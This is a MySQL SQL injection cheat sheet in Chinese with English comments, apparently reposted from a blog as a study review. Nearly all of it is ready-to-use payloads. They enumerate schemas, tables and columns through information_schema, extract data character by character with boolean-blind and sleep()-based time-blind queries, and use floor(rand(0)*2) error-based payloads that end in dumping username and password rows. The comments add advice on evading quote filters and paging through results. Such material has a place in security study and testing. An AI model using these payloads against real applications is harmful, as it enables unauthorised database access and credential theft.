  • 注入复习总结

    /*不定期更新*/

    Mysql Code:

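    # Basic enumeration through information_schema (UNION / stacked-query contexts).
    # Hex literals stand in for quoted strings, which are often filtered or escaped
    # at the injection point: 0x73716C696E6A656374 = 'sqlinject' (target schema), 0x2e = '.'
    # Every schema the current account can see (a schema is only listed when the
    # account holds at least one privilege on it).
    select schema_name from information_schema.schemata;
    # All tables of the target schema collapsed into one value, for single-row output.
    # NOTE: group_concat() output is capped by group_concat_max_len (default 1024 bytes);
    # a silently truncated list means a big schema, not a short one.
    select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
    # All columns of the target schema. Keep the table name in each entry: a bare
    # column list for a whole schema loses which table each column belongs to.
    select group_concat(concat(table_name,0x2e,column_name)) from information_schema.columns where table_schema=0x73716C696E6A656374;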
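    # Boolean-based blind. Each payload is appended to an injectable condition
    # (e.g. ?id=1 and ...); the page content differs depending on whether the
    # comparison holds. Test one character per request and binary-search its value.
    # First character of the current schema name; 115 = 's'.
    and ascii(mid(database(),1,1))=115;
    # Second table (LIMIT offset 1) of the current schema. Step the LIMIT offset and
    # the substring position to walk every table. The comparison is mandatory:
    # a bare ascii(...) is truthy for any non-empty name and leaks nothing.
    and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>64;
    # Second column of the current schema. information_schema.columns has no
    # column_schema; filter on table_schema (add table_name=... to scope to one table).
    and ascii(substring((select column_name from information_schema.columns where table_schema=database() limit 1,1),1,1))>64;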
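    # Time-based blind: same comparisons as above, but the signal is response latency
    # instead of page content. sleep() is evaluated once per row the enclosing query
    # touches, so a condition that holds for many rows multiplies the delay; keep the
    # subquery single-row (LIMIT 0,1) and the delay short enough not to pin the
    # server's connections (and your own client timeout) for the whole run.
    # First character of the current schema name; 115 = 's'.
    and if(ascii(substring(database(),1,1))=115,sleep(10),1);
    # First table of the target schema (0x73716C696E6A656374 = 'sqlinject').
    # LIMIT 0,1 is required: a multi-row scalar subquery raises
    # "Subquery returns more than 1 row" and never sleeps, which reads as "false".
    and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374 limit 0,1),1,1))>64,sleep(10),1);
    # First column of the target schema.
    and if(ascii(substring((select column_name from information_schema.columns where table_schema=0x73716C696E6A656374 limit 0,1),1,1))>64,sleep(10),1);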
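    # Error-based (floor/rand duplicate key). Grouping on concat(<data>, floor(rand(0)*2))
    # with a seeded rand() produces a fixed 0,1,1,0,1,1,... sequence, so the temporary
    # GROUP BY table hits a duplicate key and MySQL reports
    # "Duplicate entry '<data>1' for key 'group_key'", echoing <data> in the error text.
    # Preconditions: the application must surface DB errors, and the FROM table needs
    # at least three rows (information_schema.tables always has). The echoed value is
    # truncated in the error message (commonly cited as ~64 characters), so page
    # through long values with LIMIT / substring rather than expecting them whole.
    # 0x7e = '~' delimits the leaked value; 0x23 = '#', 0x3a = ':'; 0x61646D696E = 'admin'.
    and(select 1 from(select count(*),concat((SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    and(select 1 from(select count(*),concat((SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    # Scope the column lookup to the current schema: table_name alone also matches a
    # same-named table in any other schema the account can see.
    and(select 1 from(select count(*),concat((SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=database() and table_name=0x61646D696E LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    # Dump one credential row; step LIMIT 0,1 -> 1,1 -> ... for the rest.
    and(select 1 from(select count(*),concat((SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);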

    信息收集函数:


    user()                             #当前使用者的用户名
    database()                         #当前数据库名
    version()                          #数据库版本
    @@datadir                          #数据目录(数据库文件所在的绝对路径),注意是系统变量,需要加@@
    @@basedir                          #Mysql安装路径
    @@version_compile_os               #操作系统
    concat()                           #连接一个或者多个字符串
    group_concat()                     #连接一个组的所有字符串,并以逗号分隔每一条数据;结果长度受group_concat_max_len(默认1024字节)限制,超出部分会被静默截断

    报错常用的函数:


    count  #计算元组的个数
    rand    #取随机数
    floor    #向下取整,比如1.9就取1;rand(0)有固定种子,floor(rand(0)*2)序列可预测,这正是group by时产生重复键报错的前提

     结束


  • 原文地址:https://www.cnblogs.com/xishaonian/p/6200818.html